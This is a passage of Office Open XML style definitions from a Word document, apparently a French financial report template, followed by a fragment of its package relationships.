    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CEC9B7" w:themeFill="accent6" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CEC9B7" w:themeFill="accent6" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="249">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="33"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="250">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="31"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="251">
    <w:name w:val="No Spacing"/>
    <w:link w:val="301"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:lang w:val="en-US" w:eastAsia="ja-JP" w:bidi="ar-SA"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="252">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="11"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="253">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:kern w:val="20"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="254">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="577289" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="20"/>
      <w:sz w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="255">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="88"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="256">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="257"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:ind w:left="720" w:right="720"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:sz w:val="28"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="257">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="256"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:kern w:val="20"/>
      <w:sz w:val="28"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="258">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="37"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="259">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="13"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="260">
    <w:name w:val="Body Text 2 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="14"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="261">
    <w:name w:val="Body Text 3 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="15"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="262">
    <w:name w:val="Body Text First Indent Char"/>
    <w:basedOn w:val="259"/>
    <w:link w:val="16"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="263">
    <w:name w:val="Body Text Indent Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="17"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="264">
    <w:name w:val="Body Text First Indent 2 Char"/>
    <w:basedOn w:val="263"/>
    <w:link w:val="18"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="265">
    <w:name w:val="Body Text Indent 2 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="19"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="266">
    <w:name w:val="Body Text Indent 3 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="20"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="267">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="33"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="268">
    <w:name w:val="Closing Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="22"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="269">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="23"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="270">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="269"/>
    <w:link w:val="24"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="271">
    <w:name w:val="Date Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="25"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="272">
    <w:name w:val="Document Map Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="26"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="273">
    <w:name w:val="E-mail Signature Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="27"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="274">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="28"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="275">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="32"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="276">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:kern w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="277">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="5"/>
    <w:semiHidden/>
    <w:uiPriority w:val="18"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:kern w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="278">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="6"/>
    <w:semiHidden/>
    <w:uiPriority w:val="18"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="3A4C5B" w:themeColor="accent1" w:themeShade="80"/>
      <w:kern w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="279">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="7"/>
    <w:semiHidden/>
    <w:uiPriority w:val="18"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="3A4C5B" w:themeColor="accent1" w:themeShade="80"/>
      <w:kern w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="280">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="8"/>
    <w:semiHidden/>
    <w:uiPriority w:val="18"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="75000"/>
            <w14:lumOff w14:val="25000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="281">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="9"/>
    <w:semiHidden/>
    <w:uiPriority w:val="18"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="75000"/>
            <w14:lumOff w14:val="25000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="282">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="10"/>
    <w:semiHidden/>
    <w:uiPriority w:val="18"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="75000"/>
            <w14:lumOff w14:val="25000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="283">
    <w:name w:val="HTML Address Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="34"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="284">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="35"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="285">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="21"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="286">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="287"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="30"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="280"/>
      <w:ind w:left="936" w:right="936"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="287">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="286"/>
    <w:semiHidden/>
    <w:uiPriority w:val="30"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="288">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="32"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="CC8E60" w:themeColor="accent2"/>
      <w:spacing w:val="5"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent2"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="289">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="290">
    <w:name w:val="Macro Text Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="66"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="291">
    <w:name w:val="Message Header Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="67"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:sz w:val="24"/>
      <w:shd w:val="pct20" w:color="auto" w:fill="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="292">
    <w:name w:val="Note Heading Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="70"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="293">
    <w:name w:val="Plain Text Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="71"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="294">
    <w:name w:val="Salutation Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="72"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="295">
    <w:name w:val="Signature Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="73"/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:kern w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="296">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="74"/>
    <w:uiPriority w:val="19"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:kern w:val="20"/>
      <w:sz w:val="56"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="297">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="19"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="808080" w:themeColor="text1" w:themeTint="80"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="50000"/>
            <w14:lumOff w14:val="50000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="298">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="31"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="CC8E60" w:themeColor="accent2"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent2"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="299">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="77"/>
    <w:uiPriority w:val="19"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:kern w:val="28"/>
      <w:sz w:val="72"/>
      <w:shd w:val="clear" w:color="auto" w:fill="7E97AD" w:themeFill="accent1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="300">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="301">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="88"/>
    <w:link w:val="251"/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="302">
    <w:name w:val="Titre de tableau"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="1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line="240" w:lineRule="auto"/>
      <w:ind w:left="144" w:right="144"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="24"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="303">
    <w:name w:val="Infos société"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:spacing w:after="40"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="304">
    <w:name w:val="Tableau financier"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="144" w:right="144"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:insideH w:val="single" w:color="D8D8D8" w:themeColor="background1" w:themeShade="D9" w:sz="4" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:vAlign w:val="center"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:wordWrap/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        <w:b w:val="0"/>
        <w:caps/>
        <w:smallCaps w:val="0"/>
        <w:color w:val="7E97AD" w:themeColor="accent1"/>
        <w:sz w:val="22"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="accent1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:vAlign w:val="bottom"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:wordWrap/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="305">
    <w:name w:val="Sommaire"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="432" w:right="1080"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="808080" w:themeColor="text1" w:themeTint="80"/>
      <w:sz w:val="28"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="50000"/>
            <w14:lumOff w14:val="50000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="306">
    <w:name w:val="Texte de tableau"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="144" w:right="144"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="307">
    <w:name w:val="Titre Tableau inversé"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="144" w:right="144"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="24"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="308">
    <w:name w:val="En-tête ombré"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="2" w:space="6"/>
        <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="2" w:space="20"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="2" w:space="6"/>
        <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="2" w:space="20"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="7E97AD" w:themeFill="accent1"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="40"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="309">
    <w:name w:val="A218B64594EF4F23B56A76968126AE7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header" Target="header3.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header" Target="header2.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/glossaryDocument" Target="glossary/document.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 